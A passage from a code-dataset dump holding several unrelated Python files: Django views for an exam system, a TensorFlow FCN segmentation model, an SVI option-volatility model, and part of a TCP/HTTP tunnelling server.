self.request.data['satisfactory_audio']\n course.satisfactory_audio_url = upload_media_file(\n validated_data[\"satisfactory_audio\"]\n )\n else:\n course.satisfactory_audio = None\n if \"bad_audio\" in self.request.data:\n if self.request.data[\"bad_audio\"] != \"null\":\n # course.bad_audio = self.request.data['bad_audio']\n course.bad_audio_url = upload_media_file(validated_data[\"bad_audio\"])\n else:\n course.bad_audio = None\n\n if \"video\" in self.request.data:\n if self.request.data[\"video\"] != \"null\":\n course.video = self.request.data[\"video\"]\n else:\n course.video = \"\"\n if \"attempts\" in validated_data and self.request.data[\"attempts\"] != \"\":\n course.attempts = self.request.data[\"attempts\"]\n course.save()\n # questions = self.context['request'].data['questions']\n # questions_to_parse = validated_data['questions']\n\n if questions_to_parse:\n for question in questions_to_parse:\n course.questions.add(question)\n\n if \"image\" in validated_data:\n course.image = validated_data[\"image\"]\n\n if \"user\" in validated_data:\n user = validated_data[\"user\"]\n else:\n user = self.request.user\n\n user_relation = UserCourseRelation(user=user, course=course, access=1)\n user_relation.save()\n course.save()\n # return course\n return Response(CourseSerializer(course).data, status=status.HTTP_201_CREATED)\n\n def list(self, request):\n serializer = self.get_serializer(data=request.data)\n if type(request.user) == AnonymousUser:\n course = (\n Course.objects.all()\n .filter(token=request.query_params.get(\"token\"))\n .first()\n )\n if not course or not course.demo_allowed:\n return Response(status=status.HTTP_403_FORBIDDEN)\n else:\n timestamp = str(int(time.time()))\n login = \"demo_\" + timestamp\n\n password = \"pass_\" + timestamp\n\n register_resp = requests.post(\n \"http://127.0.0.1:8000/api/register/\",\n data={\"username\": login, \"password\": password},\n )\n\n demo_user_id = register_resp.json()[\"id\"]\n demo_user_profile = Profile.objects.filter(id=demo_user_id).first()\n demo_user_profile.group = -1 # demo group\n demo_user_profile.save()\n register_resp = requests.post(\n \"http://127.0.0.1:8000/token-auth/\",\n data={\"username\": login, \"password\": password},\n )\n\n demo_user_token = register_resp.json()[\"token\"]\n return Response(\n register_resp.json(), status=status.HTTP_401_UNAUTHORIZED\n )\n if request.method == \"GET\":\n\n queryset = Course.objects.all().filter(\n token=request.query_params.get(\"token\")\n )\n return Response(\n [CourseSerializer(course, context={'request': self.request}).data for course in queryset],\n status=status.HTTP_200_OK,\n )\n return Response([], status=status.HTTP_200_OK)\n\n def get_queryset(self):\n if type(self.request.user) == AnonymousUser:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n if self.request.method == \"GET\":\n queryset = Course.objects.all().filter(\n token=self.request.query_params.get(\"token\")\n )\n return queryset\n return Course.objects.all()\n\n def destroy(self, request, *args, **kwargs):\n # if self.request.method == \"DELETE\":\n instance = self.get_object()\n UserCourseRelation.objects.all().filter(course=instance).delete()\n CourseSession.objects.all().filter(course=instance).delete()\n Course.objects.all().get(token=instance.token).delete()\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def partial_update(self, request, *args, **kwargs):\n validated_data = self.request.data\n course = self.get_object()\n if \"name\" in validated_data:\n course.name = validated_data[\"name\"]\n if \"description\" in validated_data:\n course.description = validated_data[\"description\"]\n if \"author\" in validated_data:\n course.author = validated_data[\"author\"]\n if \"image\" in validated_data:\n\n if validated_data[\"image\"] == \"null\":\n course.image = \"\"\n else:\n if validated_data[\"image\"] != \"stay\":\n course.image = validated_data[\"image\"]\n if \"questions_number\" in validated_data:\n course.questions_number = validated_data[\"questions_number\"]\n if \"attempts\" in validated_data:\n course.attempts = validated_data[\"attempts\"]\n if \"perfect_mark\" in validated_data:\n course.perfect_mark = validated_data[\"perfect_mark\"]\n if \"good_mark\" in validated_data:\n course.good_mark = validated_data[\"good_mark\"]\n if \"satisfactory_mark\" in validated_data:\n course.satisfactory_mark = validated_data[\"satisfactory_mark\"]\n questions_to_parse = validated_data[\"questions\"]\n\n course.questions.clear()\n\n if questions_to_parse:\n for question in questions_to_parse:\n course.questions.add(question)\n\n course.save()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def perform_destroy(self, instance):\n instance.delete()\n\n\nclass CourseCreatedViewSet(viewsets.ModelViewSet):\n queryset = Course.objects.all()\n serializer_class = CourseCreatedSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"get\"]\n\n def get_queryset(self):\n if self.request.method == \"GET\":\n queryset = Course.objects.all().filter(user=self.request.user).distinct()\n\n if not queryset:\n return queryset\n for course in queryset:\n queryset_access = UserCourseRelation.objects.all().filter(\n course=course, user=self.request.user, access=1\n )\n\n if not queryset_access:\n queryset = queryset.exclude(id=course.id)\n return queryset\n\n\nclass CourseAddedViewSet(viewsets.ModelViewSet):\n queryset = Course.objects.all()\n serializer_class = CourseCreatedSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"get\"]\n\n def get_queryset(self):\n if self.request.method == \"GET\":\n queryset = Course.objects.all().filter(user=self.request.user).distinct()\n\n ids = []\n if not queryset:\n return queryset\n for course in queryset:\n queryset_access = UserCourseRelation.objects.all().filter(\n access=0, course=course, user=self.request.user\n )\n\n if not queryset_access:\n queryset = queryset.exclude(id=course.id)\n return queryset\n\n\nclass RelationViewSet(viewsets.ModelViewSet):\n queryset = UserCourseRelation.objects.all()\n serializer_class = RelationSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"post\"]\n\n # lookup_field = 'token'\n\n def get_queryset(self):\n return None\n\n\nclass RelationUnsubscribeViewSet(viewsets.ModelViewSet):\n queryset = UserCourseRelation.objects.all()\n serializer_class = RelationUnsubscribeSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"post\"]\n\n def create(self, request, *args, **kwargs):\n course = Course.objects.all().get(token=self.request.data[\"token\"])\n relation = UserCourseRelation.objects.filter(user=self.request.user, course=course, access=0)\n relation.delete()\n return Response({\"status\": \"Successfully deleted\"})\n\n\nclass StrictModeViewSet(viewsets.ModelViewSet):\n queryset = StrictMode.objects.all()\n serializer_class = StrictModeSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"get\", \"post\", \"delete\", \"patch\"]\n # lookup_field = 'id'\n def get_queryset(self):\n user = self.request.user\n if self.request.method == \"GET\":\n if self.request.query_params.get(\"token\"):\n usercourse = UserCourseRelation.objects.all().get(\n course__token=self.request.query_params.get(\"token\"), access=1\n )\n queryset = StrictMode.objects.all().filter(user=usercourse.user)\n else:\n queryset = StrictMode.objects.all().filter(user=user)\n\n return queryset\n if user.is_superuser:\n queryset = StrictMode.objects.all()\n return queryset\n return StrictMode.objects.all().filter()\n\n def destroy(self, request, *args, **kwargs):\n\n instance = self.get_object()\n\n self.perform_destroy(instance)\n\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def perform_destroy(self, instance):\n instance.delete()\n\n # def perform_destroy(self, instance):\n # instance.delete()\n\n\nclass QuestionMediaViewSet(viewsets.ModelViewSet):\n queryset = QuestionMedia.objects.all()\n serializer_class = QuestionMediaSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"get\", \"post\", \"delete\", \"patch\"]\n\n def get_queryset(self):\n user = self.request.user\n if self.request.method == \"GET\":\n queryset = QuestionMedia.objects.all().filter(\n question=self.request.query_params.get(\"id\")\n )\n\n return queryset\n if (\n user.is_superuser\n ): # TODO: either do this for all get's or delete it from here, no more methods support this logic\n queryset = QuestionMedia.objects.all()\n return queryset\n return QuestionMedia.objects.all().filter()\n\n def create(self, request, *args, **kwargs):\n validated_data = self.request.data\n question = Question.objects.all().get(id=validated_data[\"question\"])\n mode = StrictMode.objects.all().get(id=validated_data[\"mode\"])\n media = QuestionMedia(question=question, mode=mode)\n if \"audio\" in self.request.data:\n if self.request.data[\"audio\"] == \"null\":\n media.audio = None\n else:\n media.audio = self.request.data[\"audio\"]\n if \"video\" in self.request.data:\n if self.request.data[\"video\"] == \"null\":\n media.video = None\n else:\n media.video = self.request.data[\"video\"]\n media.save()\n return Response(status=status.HTTP_200_OK)\n\n def partial_update(self, request, *args, **kwargs):\n validated_data = self.request.data\n media = self.get_object()\n if \"audio\" in self.request.data:\n if \"audio\" == \"null\" or not validated_data[\"audio\"]:\n media.audio = None\n else:\n media.audio = self.request.data[\"audio\"]\n if \"video\" in self.request.data:\n if \"video\" == \"null\" or not validated_data[\"video\"]:\n media.video = None\n else:\n media.video = self.request.data[\"video\"]\n media.save()\n return Response(status=status.HTTP_200_OK)\n\n\nclass HintViewSet(viewsets.ModelViewSet):\n queryset = Hint.objects.all()\n serializer_class = HintSerializer\n permission_classes = (IsAuthenticated,)\n http_method_names = [\"get\", \"post\", \"delete\", \"patch\"]\n lookup_field = \"id\"\n\n def get_queryset(self):\n user = self.request.user\n if self.request.method == \"GET\":\n queryset = Hint.objects.all().filter(\n answer=self.request.query_params.get(\"id\")\n )\n\n return queryset\n if (\n user.is_superuser\n ): # TODO: either do this for all get's or delete it from here, no more methods support this logic\n queryset = Hint.objects.all()\n return queryset\n return Hint.objects.all().filter()\n\n def create(self, request, *args, **kwargs):\n validated_data = self.request.data\n answer = Answer.objects.all().get(id=validated_data[\"answer\"])\n mode = StrictMode.objects.all().get(id=validated_data[\"mode\"])\n hint = Hint(answer=answer, mode=mode)\n if \"audio\" in self.request.data:\n if self.request.data[\"audio\"] == \"null\":\n hint.audio = None\n else:\n hint.audio = self.request.data[\"audio\"]\n if \"video\" in self.request.data:\n if self.request.data[\"video\"] == \"null\":\n hint.video = None\n else:\n hint.video = self.request.data[\"video\"]\n if \"text\" in self.request.data:\n hint.text = self.request.data[\"text\"]\n hint.save()\n return Response(status=status.HTTP_200_OK)\n\n def partial_update(self, request, *args, **kwargs):\n validated_data = self.request.data\n answer = Answer.objects.all().get(id=validated_data[\"answer\"])\n mode = StrictMode.objects.all().get(id=validated_data[\"mode\"])\n # hint = Hint(answer = answer, mode = mode)\n hint = self.get_object()\n if \"audio\" in self.request.data:\n if self.request.data[\"audio\"] == \"null\":\n hint.audio = \"\"\n else:\n if self.request.data[\"audio\"] != \"stay\":\n hint.audio = self.request.data[\"audio\"]\n if \"video\" in self.request.data:\n if self.request.data[\"video\"] == \"null\":\n hint.video = \"\"\n else:\n if self.request.data[\"video\"] != \"stay\":\n hint.video = self.request.data[\"video\"]\n if \"text\" in self.request.data:\n hint.text = self.request.data[\"text\"]\n hint.save()\n return Response(status=status.HTTP_200_OK)\n","repo_name":"Alveona/exam-system","sub_path":"backend/exam_backend/exam_manage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":28964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"18750202897","text":"import tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\nimport logging\ntf.get_logger().setLevel(logging.ERROR)\nimport numpy as np\n\nMEANS = [84.00721708, 98.98497608, 106.0256254]\n\ndef _decode_img(feature, shape, dtype):\n image = tf.decode_raw(feature, dtype)\n image_shape = tf.stack(shape)\n\n return tf.reshape(image, image_shape)\n\ndef _parse_image_with_labels(example_proto):\n '''Parses a TFRecord from file to examples'''\n features = {\n 'name': tf.FixedLenFeature([], tf.string),\n 'height': tf.FixedLenFeature([], tf.int64),\n 'width': tf.FixedLenFeature([], tf.int64),\n 'depth': tf.FixedLenFeature([], tf.int64),\n 'image': tf.FixedLenFeature([], tf.string),\n 'label': tf.FixedLenFeature([], tf.string),\n }\n\n parsed_features = tf.parse_single_example(example_proto, features)\n\n height = tf.cast(parsed_features['height'], tf.int32)\n width = tf.cast(parsed_features['width'], tf.int32)\n depth = tf.cast(parsed_features['depth'], tf.int32)\n\n image = _decode_img(\n parsed_features['image'],\n [depth, height, width],\n tf.uint8\n )\n\n image = tf.transpose(image, perm=[1, 2, 0])\n\n # normalisation\n image = tf.cast(image, tf.float32)\n image = image - MEANS\n zeros = tf.equal(image, tf.constant(0., dtype=tf.float32))\n image = tf.where(zeros, tf.zeros_like(image), image)\n label = _decode_img(\n parsed_features['label'],\n [height, width],\n tf.uint8\n )\n \n name = tf.cast(parsed_features['name'], tf.string)\n \n return name, image, label\n\ndef get_from_records(pattern, batch_size, buffer, shuffle=True):\n records = tf.data.Dataset.list_files(pattern, shuffle=shuffle)\n dataset = tf.data.TFRecordDataset(records)\n dataset = dataset.map(lambda x: _parse_image_with_labels(x))\n \n if shuffle:\n # Buffer size is key for random sampling!\n dataset = dataset.shuffle(buffer_size=buffer)\n \n dataset = dataset.batch(batch_size)\n\n return dataset\n\nNUM_OF_CLASSES = 2\n\ndef _bilinear_filter(size):\n factor = (size + 1) // 2\n if size % 2 == 1:\n centre = factor - 1\n else:\n centre = factor - 0.5\n og = np.ogrid[:size, :size]\n return (1 - abs(og[0] - centre) / factor) * \\\n (1 - abs(og[1] - centre) / factor)\n\ndef _upscore_filter(shape):\n h, w, nin, nout = shape\n filt = _bilinear_filter(w) #h, w for square\n weights = np.zeros(shape)\n for l in range(nin):\n weights[:, :, l, l] = filt\n init = tf.constant_initializer(value=weights, dtype=tf.float32)\n up_filt = tf.get_variable(\n name='upscore_filter', initializer=init,\n shape=weights.shape)\n\n return up_filt\n\ndef _expand_label(label, classes):\n # element wise expansion of labels\n label_expand = list(map(lambda x: tf.equal(label, x), classes))\n stack = tf.stack(label_expand, axis=2)\n\n return tf.to_float(stack)\n\ndef batch_expand_labels(labels, classes):\n batch_labels = tf.map_fn(\n lambda x: _expand_label(x, classes),\n labels,\n dtype=tf.float32\n )\n return batch_labels\n\ndef loss(logits, labels):\n labels = tf.cast(labels, tf.int64)\n xentropy = tf.nn.softmax_cross_entropy_with_logits_v2(\n labels=labels, \n logits=logits,\n name='cross_entropy_per_example'\n )\n mean_xentropy = tf.reduce_mean(xentropy, name='cross_entropy')\n tf.add_to_collection('losses', mean_xentropy)\n total_loss = tf.add_n(tf.get_collection('losses'), name='total_loss')\n \n return total_loss\n\ndef _conv_relu(name, bottom, nout, ks=[1, 1], strides=[1, 1, 1, 1],\n in_layers=None, trainable=True, return_relu=True):\n \"\"\"\n \"\"\"\n with tf.variable_scope(name) as scope:\n if in_layers is None:\n nin = bottom.shape.as_list()[3]\n else:\n nin = in_layers\n shape = ks + [nin, nout]\n kernel = tf.get_variable(\n 'weights', shape,\n dtype=tf.float32, trainable=trainable)\n conv = tf.nn.conv2d(\n bottom, kernel, strides, padding='SAME',\n name=name)\n biases = tf.get_variable('biases', [nout], trainable=trainable)\n pre_activation = tf.nn.bias_add(\n conv, biases,\n name=name)\n if return_relu:\n relu = tf.nn.relu(\n pre_activation, name=name.replace('conv', 'relu'))\n\n return pre_activation, relu\n\n return pre_activation\n\ndef _max_pool(name, bottom):\n maxp = tf.nn.max_pool(\n bottom, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME', name=name)\n\n return maxp\n\ndef _upscale(name, bottom, nin, nout, out_shape, ks=[1, 1],\n strides=[1, 2, 2, 1], trainable=True):\n with tf.variable_scope(name) as scope:\n shape = ks + [nin, nout]\n kernal = _upscore_filter(shape)\n conv = tf.nn.conv2d_transpose(\n bottom, kernal,\n out_shape, strides,\n padding='SAME', name=name)\n return conv\n\ndef inference(x, in_layers=3):\n # convolution layers\n conv1_1, relu1_1 = _conv_relu('conv1_1', x, 64, ks=[3, 3],\n in_layers=in_layers)\n conv1_2, relu1_2 = _conv_relu('conv1_2', relu1_1, 64, ks=[3, 3])\n pool1 = _max_pool('pool1', relu1_2)\n\n conv2_1, relu2_1 = _conv_relu('conv2_1', pool1, 128, ks=[3, 3])\n conv2_2, relu2_2 = _conv_relu('conv2_2', relu2_1, 128, ks=[3, 3])\n pool2 = _max_pool('pool2', relu2_2)\n\n conv3_1, relu3_1 = _conv_relu('conv3_1', pool2, 256, ks=[3, 3])\n conv3_2, relu3_2 = _conv_relu('conv3_2', relu3_1, 256, ks=[3, 3])\n conv3_3, relu3_3 = _conv_relu('conv3_3', relu3_2, 256, ks=[3, 3])\n pool3 = _max_pool('pool3', relu3_3)\n\n conv4_1, relu4_1 = _conv_relu('conv4_1', pool3, 512, ks=[3, 3])\n conv4_2, relu4_2 = _conv_relu('conv4_2', relu4_1, 512, ks=[3, 3])\n conv4_3, relu4_3 = _conv_relu('conv4_3', relu4_2, 512, ks=[3, 3])\n pool4 = _max_pool('pool4', relu4_3)\n\n conv5_1, relu5_1 = _conv_relu('conv5_1', pool4, 512, ks=[3, 3])\n conv5_2, relu5_2 = _conv_relu('conv5_2', relu5_1, 512, ks=[3, 3])\n conv5_3, relu5_3 = _conv_relu('conv5_3', relu5_2, 512, ks=[3, 3])\n pool5 = _max_pool('pool5', relu5_3)\n\n # Fully convolutional with dropout\n fc6, relu6 = _conv_relu('fc6', pool5, 4096, ks=[7, 7])\n drop6 = tf.nn.dropout(relu6, keep_prob=.5)\n fc7, relu7 = _conv_relu('fc7', drop6, 4096, ks=[1, 1])\n drop7 = tf.nn.dropout(relu7, keep_prob=.5)\n\n # Skips\n fc7_score = _conv_relu(\n '7_score', drop7,\n NUM_OF_CLASSES, return_relu=False)\n pool4_score = _conv_relu(\n 'pool4_score', pool4,\n NUM_OF_CLASSES, return_relu=False)\n pool4_nin = pool4_score.get_shape()[3].value\n fc7_upscore = _upscale(\n 'upscale_pool4', fc7_score,\n pool4_nin, NUM_OF_CLASSES,\n tf.shape(pool4_score), ks=[4, 4])\n fuse_pool4 = tf.add(pool4_score, fc7_upscore, name='fuse_pool4')\n\n pool3_score = _conv_relu(\n 'pool3_score', pool3,\n NUM_OF_CLASSES, return_relu=False)\n pool3_nin = pool3_score.get_shape()[3].value\n fuse_pool4_upscore = _upscale(\n 'upscale_pool3', fuse_pool4,\n pool3_nin, NUM_OF_CLASSES,\n tf.shape(pool3_score), ks=[4, 4])\n fuse_pool3 = tf.add(\n pool3_score, fuse_pool4_upscore,\n name='fuse_pool3')\n\n # Upscale to image size\n shape = tf.shape(x)\n out_shape = tf.stack([shape[0], shape[1], shape[2], NUM_OF_CLASSES])\n score = _upscale(\n 'upscale_orig', fuse_pool3,\n pool3_nin, NUM_OF_CLASSES,\n out_shape, ks=[16, 16], strides=[1, 8, 8, 1])\n\n return score\n\ndef train(total_loss, learning_rate):\n op = tf.train.AdamOptimizer(learning_rate=learning_rate)\n grads = op.compute_gradients(total_loss, var_list=None)\n return op.apply_gradients(grads)\n","repo_name":"dspix/tf-practicals","sub_path":"code/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":7850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"42632437008","text":"import numpy as np\nfrom . import opt_smile_abc as smile\nfrom . import bsm\n\n\nclass Svi(smile.OptSmileABC):\n \"\"\"\n Stochastic Volatility-inspired (SVI) model by Gatheral.\n\n References\n - Gatheral J, Jacquier A (2013) Arbitrage-free SVI volatility surfaces. arXiv:12040646 [q-fin]\n \"\"\"\n\n vov, rho, smooth, shift = 0.4, -0.4, 0.1, 0.0\n\n def __init__(self, sigma=0.04, vov=0.4, rho=-0.4, smooth=0.1, shift=0.0, intr=0.0, divr=0.0, is_fwd=False):\n \"\"\"\n Raw SVI parametrization\n\n Args:\n sigma: level (a)\n vov: vol-of-vol (b)\n rho: rotation (rho)\n smooth: smoothness (sigma)\n shift: translation (m)\n intr: interest rate (domestic interest rate)\n divr: dividend/convenience yield (foreign interest rate)\n is_fwd: if True, treat `spot` as forward price. False by default.\n \"\"\"\n\n self.sigma, self.vov, self.rho, self.smooth, self.shift = sigma, vov, rho, smooth, shift\n super().__init__(sigma, intr=intr, divr=divr, is_fwd=is_fwd)\n\n def base_model(self, sigma=None):\n base_model = bsm.Bsm(sigma, intr=self.intr, divr=self.divr, is_fwd=self.is_fwd)\n return base_model\n\n def vol_for_price(self, strike, spot, texp):\n fwd = self.forward(spot, texp)\n money = np.log(strike / fwd) - self.shift\n vol = np.sqrt(self.sigma + self.vov * (self.rho * money + np.sqrt(money**2 + self.smooth**2)))\n return vol\n\n @classmethod\n def init_from_heston(cls, sigma, vov=0.8, rho=-0.7, mr=0.5, theta=None, texp=1.0, intr=0.0, divr=0.0, is_fwd=False):\n \"\"\"\n SVI initalization with equivalent Heston model by Gatheral & Jacquier (2011)\n\n Args:\n sigma: Heston sigma\n vov: Heston vov\n rho: Heston rho\n mr: Heston mr\n theta: Heston theta\n texp: time to expiry\n intr: interest rate (domestic interest rate)\n divr: dividend/convenience yield (foreign interest rate)\n is_fwd: if True, treat `spot` as forward price. False by default.\n\n Returns: model\n\n References:\n - Gatheral J, Jacquier A (2011) Convergence of Heston to SVI. Quantitative Finance 11:1129–1132. https://doi.org/10.1080/14697688.2010.550931\n \"\"\"\n\n theta = sigma if theta is None else theta\n\n rhoc2 = 1 - rho**2\n w1 = np.sqrt((2*mr - rho*vov)**2 + vov**2 * rhoc2) - (2*mr - rho*vov)\n w1 *= (4*mr*theta) / (vov**2 * rhoc2)\n w2 = sigma / (mr * theta)\n sigma_ = w1 * rhoc2 / 2\n vov_ = (w1 * w2) / (2 * texp)\n shift = - rho * texp / w2\n smooth = np.sqrt(rhoc2) * texp / w2\n m = cls(sigma_, vov=vov_, rho=rho, smooth=smooth, shift=shift, intr=intr, divr=divr, is_fwd=is_fwd)\n\n return m\n\n def price(self, strike, spot, texp, cp=1):\n vol = self.vol_for_price(strike, spot, texp)\n m_vol = self.base_model(vol)\n price = m_vol.price(strike, spot, texp, cp=cp)\n return price\n","repo_name":"PyFE/PyFENG","sub_path":"pyfeng/svi.py","file_name":"svi.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"65"} +{"seq_id":"39741351508","text":"#!/usr/bin/env python3\n# coding=utf-8\n\nfrom common_func import *\nimport queue\n# import ssl\nimport base64\n\nclass http_service:\n def __init__(self,cfg):\n self.cfg = cfg\n\n self.customer_listen_addr = split_host(cfg['customer'])\n\n self.socketbridge = HttpBridge(\"http\")\n self.socketbridge.start_as_daemon()\n\n self.run_master(None,self.customer_listen_addr)\n\n def updateconfig(self,cfg):\n self.cfg = cfg\n\n to_master = split_host(cfg['to_master'])\n hostdict = {}\n\n for item in cfg['host']:\n iteminfo = {}\n iteminfo['port'] = to_master[1]\n if item.get('auth'):\n iteminfo['username'] = item['auth']['username']\n iteminfo['password'] = item['auth']['password']\n if self.customer_listen_addr[1] == 80:\n hostdict['http://' + item['domain']] = iteminfo\n else:\n hostdict['http://' + item['domain'] + ':' + str(self.customer_listen_addr[1])] = iteminfo\n if self.socketbridge:\n self.socketbridge.updateconfig(hostdict)\n\n def dispose(self):\n if self.master:\n self.master.dispose()\n\n def run_master(self,communicate_addr, customer_listen_addr):\n log.info(\"http_service customer from: {}\".format(\n fmt_addr(customer_listen_addr)))\n\n self.master = HTServer(customer_listen_addr, communicate_addr,None,self.socketbridge)\n self.master.serve_forever()\n\n\nclass https_service:\n pemfile = 'serverssl/ssl.crt' # 服务证书公钥\n keyfile = 'serverssl/ssl.key' # 服务证书密钥\n\n def __init__(self,cfg):\n self.cfg = cfg\n self.communicate_addr = split_host(cfg['master'])\n self.customer_listen_addr = split_host(cfg['customer'])\n self.SECRET_KEY = cfg['secretkey']\n\n hostdict = {}\n hostdict['https://hehui.ngrokhk.linkbus.xyz:8443'] = 10014\n self.socketbridge = HttpBridge(hostdict,\"https\")\n self.socketbridge.start_as_daemon()\n\n self.pkg = CtrlPkg()\n self.pkg.recalc_crc32(self.SECRET_KEY)\n\n logging.info(\n \"main_master,{},{},id:{},self.pkg:{}\".format(cfg['master'], self.SECRET_KEY, id(self), id(self.pkg)))\n\n self.run_master(self.communicate_addr,self.customer_listen_addr,self.pkg)\n\n def run_master(self,communicate_addr, customer_listen_addr,pkg):\n log.info(\"http_service from: {} customer from: {}\".format(\n fmt_addr(communicate_addr), fmt_addr(customer_listen_addr)))\n\n self.master = HTServer(customer_listen_addr, communicate_addr,True,pkg,self.socketbridge)\n self.master.serve_forever()\n\nclass HTServer:\n def __init__(self, customer_listen_addr, communicate_addr=None,\n ssl=None, socketbridge=None,_listening_sockets=None):\n \"\"\"\n\n :param customer_listen_addr: equals to the -c/--customer param\n :param communicate_addr: equals to the -m/--master param\n \"\"\"\n\n # self.ssl = ssl\n\n self._stopped = {\"stop\":False}\n\n self._listening_sockets = []\n self.thread_pool = {}\n self.thread_pool[\"spare_slaver\"] = {}\n self.thread_pool[\"working_slaver\"] = {}\n\n self.working_pool = {}\n\n self.socket_bridge = socketbridge\n\n # a queue for customers who have connected to us,\n # but not assigned a slaver yet\n self.pending_customers = queue.Queue()\n\n # self.communicate_addr = communicate_addr\n\n\n\n # prepare Thread obj, not activated yet\n self.customer_listen_addr = customer_listen_addr\n _fmt_communicate_addr = fmt_addr(self.customer_listen_addr)\n\n self.thread_pool[\"listen_customer\"] = threading.Thread(\n target=self._listen_customer,\n name=\"listen_customer-{}\".format(_fmt_communicate_addr),\n daemon=True,\n )\n\n\n # prepare assign_slaver_daemon\n self.thread_pool[\"assign_slaver_daemon\"] = threading.Thread(\n target=self._assign_slaver_daemon,\n name=\"assign_slaver_daemon-{}\".format(_fmt_communicate_addr),\n daemon=True,\n )\n\n def dispose(self):\n self._stopped['stop'] = True\n logging.info(\"master dispose {}\".format(self._stopped))\n # while len(self.slaver_pool):\n # slaver = self.slaver_pool.pop()\n # try:\n # slaver['addr_slaver'].shutdown(socket.SHUT_WR)\n # except Exception as e:\n # pass\n # try:\n # slaver['conn_slaver'].shutdown(socket.SHUT_WR)\n # except Exception as e:\n # pass\n # try:\n # slaver['addr_slaver'].close()\n # except Exception as e:\n # pass\n # try:\n # slaver['conn_slaver'].close()\n # except Exception as e:\n # pass\n # self.working_pool = None\n for sock in self._listening_sockets:\n try:\n sock.shutdown(socket.SHUT_RDWR)\n except Exception as e:\n pass\n try:\n sock.close()\n except Exception as e:\n pass\n self.thread_pool[\"socket_bridge\"] = None\n self.pending_customers = None\n\n def serve_forever(self):\n # if not self.external_slaver:\n # self.thread_pool[\"listen_slaver\"].start()\n # self.thread_pool[\"heart_beat_daemon\"].start()\n self.thread_pool[\"listen_customer\"].start()\n self.thread_pool[\"assign_slaver_daemon\"].start()\n self.thread_pool[\"socket_bridge\"] = self.socket_bridge.get_thread()\n\n # while True:\n # time.sleep(10)\n\n def try_bind_port(self,sock, addr):\n while not self._stopped['stop']:\n try:\n sock.bind(addr)\n except Exception as e:\n log.error((\n \"unable to bind {}, {}. If this port was used by the recently-closed shootback itself\\n\"\n \"then don't worry, it would be available in several seconds\\n\"\n \"we'll keep trying....\").format(addr, e))\n log.debug(traceback.format_exc())\n time.sleep(3)\n else:\n break\n\n def _transfer_complete(self, addr_customer):\n \"\"\"a callback for SocketBridge, do some cleanup jobs\"\"\"\n log.info(\"customer complete: {}\".format(addr_customer))\n del self.working_pool[addr_customer]\n\n def _serve_customer(self, conn_customer,):\n \"\"\"put customer and slaver sockets into SocketBridge, let them exchange data\"\"\"\n self.socket_bridge.add_conn_pair(\n conn_customer,\n functools.partial( # it's a callback\n # 这个回调用来在传输完成后删除工作池中对应记录\n self._transfer_complete,\n conn_customer.getpeername()\n )\n )\n\n def _send_heartbeat(self,conn_slaver):\n \"\"\"send and verify heartbeat pkg\"\"\"\n conn_slaver.send(self.pkg.pbuild_heart_beat().raw)\n\n pkg, verify = self.pkg.recv(\n conn_slaver, expect_ptype=CtrlPkg.PTYPE_HEART_BEAT) # type: CtrlPkg,bool\n\n if not verify:\n return False\n\n if pkg.prgm_ver < 0x000B:\n # shootback before 2.2.5-r10 use two-way heartbeat\n # so there is no third pkg to send\n pass\n else:\n # newer version use TCP-like 3-way heartbeat\n # the older 2-way heartbeat can't only ensure the\n # master --> slaver pathway is OK, but the reverse\n # communicate may down. So we need a TCP-like 3-way\n # heartbeat\n conn_slaver.send(self.pkg.pbuild_heart_beat().raw)\n\n return verify\n\n def _heart_beat_daemon(self):\n default_delay = 5 + SPARE_SLAVER_TTL // 12\n delay = default_delay\n log.info(\"heart beat daemon start, delay: {}s\".format(delay))\n while not self._stopped['stop']:\n time.sleep(delay)\n # log.debug(\"heart_beat_daemon: hello! im weak\")\n\n # ---------------------- preparation -----------------------\n slaver_count = len(self.slaver_pool)\n\n # logging.info(\"_heart_beat_daemon test {},{}\".format(id(self),self._stopped))\n\n if not slaver_count:\n log.warning(\"heart_beat_daemon: sorry, no slaver available, keep sleeping\")\n # restore default delay if there is no slaver\n delay = default_delay\n continue\n else:\n # notice this `slaver_count*2 + 1`\n # slaver will expire and re-connect if didn't receive\n # heartbeat pkg after SPARE_SLAVER_TTL seconds.\n # set delay to be short enough to let every slaver receive heartbeat\n # before expire\n delay = 1 + SPARE_SLAVER_TTL // max(slaver_count * 2 + 1, 12)\n\n # pop the oldest slaver\n # heartbeat it and then put it to the end of queue\n slaver = self.slaver_pool.popleft()\n addr_slaver = slaver[\"addr_slaver\"]\n\n # ------------------ real heartbeat begin --------------------\n start_time = time.perf_counter()\n try:\n hb_result = self._send_heartbeat(slaver[\"conn_slaver\"])\n except Exception as e:\n log.warning(\"error during heartbeat to {}: {}\".format(\n fmt_addr(addr_slaver), e))\n log.debug(traceback.format_exc())\n hb_result = False\n finally:\n time_used = round((time.perf_counter() - start_time) * 1000.0, 2)\n # ------------------ real heartbeat end ----------------------\n\n if not hb_result:\n log.warning(\"heart beat failed: {}, time: {}ms\".format(\n fmt_addr(addr_slaver), time_used))\n try_close(slaver[\"conn_slaver\"])\n del slaver[\"conn_slaver\"]\n\n # if heartbeat failed, start the next heartbeat immediately\n # because in most cases, all 5 slaver connection will\n # fall and re-connect in the same time\n delay = 0\n\n else:\n log.debug(\"heartbeat success: {}, time: {}ms\".format(\n fmt_addr(addr_slaver), time_used))\n self.slaver_pool.append(slaver)\n\n def _handshake(self,conn_slaver):\n conn_slaver.send(self.pkg.pbuild_hs_m2s().raw)\n\n log.debug(\"CtrlPkg 